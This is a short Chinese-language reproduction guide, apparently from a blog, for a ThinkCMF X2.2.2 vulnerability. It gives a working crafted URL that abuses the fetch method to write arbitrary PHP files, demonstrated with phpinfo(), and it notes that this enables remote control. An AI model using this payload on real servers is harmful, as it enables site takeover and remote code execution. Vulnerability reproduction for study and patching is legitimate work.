1.搭建环境

下载ThinkCMF X2.2.2文件,把文件放入网站目录下,打开网站,按照提示一步步进行安装。(thinkCMF安装包,百度搜索获取)

2.漏洞概述

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

3.漏洞利用

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,下面将把PHP查看配置函数phpinfo()写入test.php文件
phpinfo版payload如下

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
执行payload,页面将是空白的
ThinkCMF X2.2.2漏洞复现访问test.php
ThinkCMF X2.2.2漏洞复现
到达这一步你就可以向服务器写入任意PHP文件,实现远程控制,构造恶意URL等。,

相关文章:

  • 2021-12-07
  • 2021-07-18
  • 2022-12-23
  • 2021-11-12
  • 2021-08-02
  • 2021-04-23
猜你喜欢
  • 2021-09-25
  • 2022-12-23
  • 2022-01-07
  • 2021-04-17
  • 2022-02-07
  • 2021-11-04
  • 2022-01-22
相关资源
相似解决方案